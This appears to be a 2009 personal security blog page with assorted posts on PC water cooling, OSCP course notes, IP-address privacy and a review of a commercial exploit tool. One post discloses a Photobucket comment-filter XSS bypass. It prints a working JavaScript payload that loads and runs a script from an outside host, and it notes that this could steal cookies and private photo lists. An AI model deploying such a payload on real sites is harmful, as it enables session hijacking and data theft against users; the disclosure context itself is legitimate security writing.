Joey Adams Dot Net

Southern Fried Programming

Update

June 25th, 2009 by Joey in Uncategorized | No Comments →

I haven’t posted much in a while, this is mostly due to me taking a break from the industry and giving myself a summer to relax. I am still in touch with most people and watch industry news, however.

I was supposed to speak at toorcamp this year, however due to financial reasons, I will not be making it.

I will be back in the mix and attending the state defcon user group in July, so look for much more activity in July and August, as I have much planned, in terms of speaking, videos, articles, and more insight into what is going on. Feel free to contact me if you want until then.

My thoughts on pc water cooling

April 12th, 2009 by Joey in Uncategorized | No Comments →

I have had a water cooled CPU via a nice Koolance case with the reservoir, pump, radiator and controls all mounted on top of the case, and it ran for a good 2 or so years without too much trouble.

The only 2 troubles I had , was from my ignorance of getting complacent and not doing regular maintenance, so water levels dropped a bit.

Recently my pc started shutting off randomly. I first checked the water levels, since they were the culprit in the past, however I noticed something else this time around. Apparently I had a leak at the water block, and it was seeping through little by little onto my mobo and vga cards. This was not a HUGE issue, since I use a mixture of distilled water and water wetter as an glycol additive.

However after cleaning the board and the cards, it seemed it wasn’t done. After taking out two of my cards, it then took the board with it. I got pretty scared at risk of losing other components and yanked the board and tried to bench it, in which it failed horribly.

New board, single vga solution, and air cooling parts are on the way.

Now for the real meat of this post, my thoughts. Water cooling, when done correctly, and maintained regularly can be very good looking, and can offer a distinct advantage in the cooling department. However, the maintenance tedious, and if you have a water cooled computer, you should be cleaning all blocks, blowing out the radiator, checking fans, and flushing your system at least twice a year, and checking water levels once a month.

This work is all fine and dandy, but its the middle work and risk in where I find the problem. If a component dies, disassembling the water cooling system to access some components can be a pain, even in a well designed full tower case. The risk is trivial, you have a leak, or develop a leak, leak slowly builds over time and goes unnoticed, you lose vital components. Doesn’t matter what you are cooling with, liquid will seep into all crevices of your components, and either short or burn them. The glycol additives out there really make things worse by saturating everything deeply.

My advice on water cooling is, if you are constantly moving/changing/upgrading your PC, then it may be for you. If you are a workhorse who leaves his PC on forever and uses it for business, then I would highly suggest going with an air solution. Great air coolers are about $30 these days.

New PGP Key

April 6th, 2009 by Joey in Uncategorized | No Comments →

Take note of the new PGP key on my Contact page if you want to contact me in a secure manner.

You can also find the key on the mit/pgp.com keyservers.

Marine-One Specs Compromised

March 1st, 2009 by Joey in Uncategorized | No Comments →

I’ll make this one short, but apparently the blueprints and specs of Marine One, the president’s helicopter, ended up on a file sharing network after an employee of a Defense Contractors installed a p2p client that added files from the computer to the shared library, on the computer, was the blueprints and specs.

Why would such sensitive data be stored on employee workstations, and why should these workstations even be connected to the internet?

Offensive Security 101 Wrap-up

February 20th, 2009 by Joey in security | No Comments →

I took my exam for my OSCP last weekend, and have to admit, even though throughout the course I didn’t have too many problems, I was nervous going into the exam.

Like an idiot, I partied the day before the exam, and woke up 2 hours after the starting time. I had read some advice that really helped out during the exam, which was to take your time, think about things, and come back to them. I treated this day pretty nonchalantly, when I got stuck on something I would move to the next thing. If I was at a stand still with everything, I would go watch some television and just relax and clear my mind. Things slowly fell into place and I was able to complete the exam 100%.

As for reviewing the exam, if you are in the security industry, or are just interested in aspects of offensive security, you should do yourself a favor and take this course. I had a fair bit of knowledge before going into it, but after this course I am capable of so much more, and really feel as if I have a grip on things.

You really can not understand how amazing of a course it is until you take it, and I promise you, the $500 is a complete and utter steal for what you will learn and have access to.

Oh… and try harder…

Ontario Court on IP Address Resolution

February 13th, 2009 by Joey in Uncategorized | No Comments →

I’ll start by saying the obvious, I am not a lawyer. Everything you may or may not read is my opinion as a hacker and programmer, and I feel that being on both sides of the wall, I have a good understanding about the expectation of privacy on the web.

The first question everyone should ask themselves is, would it be ok if someone, whether the police, or your next door neighbor, was able to see what you are doing on the internet.

I will attempt keep the analogies to a minimum, because I feel that they are better suited for ‘dumbing’ things down and when used in intelligent conversation they are often a misdirection, and a trick to get you thinking about a different issue and to apply those thoughts to the issue at hand, if not thought through.

The court stated that an IP address is in public domain and when you are online you do not have a reasonable expectation of privacy. The issue with this, is if this information is in public domain, then can I call my ISP and ask them to give me the name/address of a customer that had the IP address x at time y . No, of course not.

Your IP address is a routing agent, that alone. It does not identify you with your ISP, your personal information does, in many cases, you have a dynamically assigned IP address, that changes between initializations with your ISP. Everyone should stop looking at this being about the IP address.
Read the rest of this entry »

Wake up, make coffee, break photobucket xss filters.

February 12th, 2009 by Joey in Uncategorized | 4 Comments →

UPDATE:
Photobucket Developers are aware of the issue and the holes are being closed as you read this.

This morning, while uploading a photo to photobucket, I noticed they had added a comment system. All I could think of is they had to of secured this after all the old mishaps they had with leaking info.

After 5 minutes, I found I was wrong. They forbid you to post links, however if you look at the default comment added by the user ‘photobucket’, there is clearly a link in there. Now maybe hardcoded, and maybe they do not filter comments from that privileged user, but that is not the case. By simply adding the url from the posted link, your anchor becomes valid, sort of. By simply using inline javascript , making a dummy variable containing this link, and creating a simplistic egg loader to grab an external js file, you can effectively escape all filtering.

Using this , one could steal cookies, or use ajax to grab a list of photos in the victims account, private or not.

I would contact them, but I looked for literally 10 minutes and could not find a viable contact option.

PoC below with loader: 

<a href="javascript:
var d = 'http://s365.photobucket.com/albums/oo92/photobucket/?action=share';
var s = document.createElement('script');
s.src = 'http://bin.joeyadams.net/a.js';
document.body.appendChild(s);
void(0);
">test</a>

Ps: There is also a way to auto-fire this, ;) but I’ll let you find that.

I dub thee VIIRP (Viral Information Integrity Reflective Poisoning)

February 11th, 2009 by Joey in Uncategorized | No Comments →

The link at the bottom explains it all. The title is just a joke, since all cool things must have a buzzword.

What seemed to happen is media sources used information taken from an unapproved edit of a wikipedia article about someone, in which the edit had added false material. Once the wiki edit was challeneged, wikipedia found information about the subject on said media source, which had its info taken from the falsified wiki entry.

The loop closes itself and makes itself true.

An attack vector? No, haha, in the future , when integrity checking systems are autonomous and use spiders to collectively judge the authenticity of a piece of information, then a viral reflective infection in which outlets mirror data from a source that mirrors a malformed entry on a reputable site could cause some dismay in web trust, which if you think there is any trust between web services, you shouldn’t be touching a piece of code. I for one , do not even trust static data coming from an integrated application I coded myself, let alone allow 3rd party information to be dynamically leaked at will.

A good visualization of a future vector for attack can be thought of by rss feed synchronization between un-affiliated sites. I’ll go ahead and coin this attack, STIRTS, or Spanning Tree Infection of the Replication of Trusted Syndication. hahaha

“One feed, to infect them all” ??? I know, I know.

Link: http://tech.slashdot.org/article.pl?sid=09/02/10/2211220&from=rss

Final Week: Offensive Security 101 , 1 week to rest

February 10th, 2009 by Joey in security | No Comments →

I just finished my last day of the Offensive Security101 course and am so glad I took the time to take it. The amount of knowledge I have gained alone is worth easily tripple the cost of the course and the contacts and networking gained are untouchable.

This is my week of relation , before my OSCP exam next saturday. In the down time, I think I’m going to install Debian onto my computer, with e17 and xinerama. It will give me something to do, and I’m sure there will be a good bit of headaches along the way to keep me entertained.

Debian/e17/xinerama install notes to come soon.
Test Results next sunday.

EOW2: Saint Exploit Review

January 24th, 2009 by Joey in security | 3 Comments →

It is the end of week 2 of my Offsec101 course, and I am still learning a ton. I went ahead and sent in for my demo of SaintExploit, which is one of the perks you get for taking the course. I will review the other when I receive it.

My first thoughts, before using Saint Exploit was that it was a huge package, and had a lot of overhead. I generally dislike web interfaced programs that have nothing to do with configuration,management, or manipulation of web applications, however this was an exception.

I have a limited address limit, (10 ip addresses), so I compiled a list of a few questionable work computers, and my home addresses. I am at work now, and had m EEE with me, so I booted it up and ran  saint exploit, and added my generated key to the application.

Next I selected which hosts from the key file I wanted to perform penetration tests on. After that it is all about watching and waiting, while it automates the penetration testing life-cycle on each host.

At the end of the testing, it presents, in detailed format, the results, and their impact, as well as exploits that succeeded and their CVE’s.

Testing by hand, I could not penetrate one of the PC’s yesterday, however Saint Exploit done so, surprisingly by weak password and an exploit. The exploit used was one I thought the system was vulnerable to, but could not get metasploit or any exploit code to execute correctly on it. This, my friends, is the difference between open exploit code and commercial grade exploit code.

I do not think I will be getting a license for Saint Exploit, because I’m broke would be the first reason, however I would recommend it in a heartbeat to any serious penetration tester or auditor who could afford a license.

Addendum:

I didn’t realize how much it sounded like I was bashing the metasploit team.  I don’t proofread my articles, as I’m sure anyone whos read any of my posts can tell haha.

Turns out, it was not the metasploit module that was giving me problems, it was my own brain. The module I was working with, that I had suspected the server vulnerable to was the msdns_zonename exploit. After some enumeration, I attempted the metasploit exploit on different ports that I was suspect to, and it never succeeded.

Had I just stfu and let metasploit do what it does and run an automatic check :) , then I would have seen that it enumerated a port I did not find in my scans, and successfully exploited it.  I learned a pretty valuable lesson in not trusting myself, and port scanning beyond the basic common ports, as I believe the vulnerable DNS RPC service is randomly binded to a high port, above 1024 or something like that.

Nevertheless, I think Saint Exploit and other such tools, like CI, and scanners like Nessus, serve their purpose, but should not be relied on. My thinking, is that if you can afford a SE/CI license, that maybe doing a starting/finishing scan with these products, along with a manual testing, would make sure no stones are left unturned.

← Previous Entries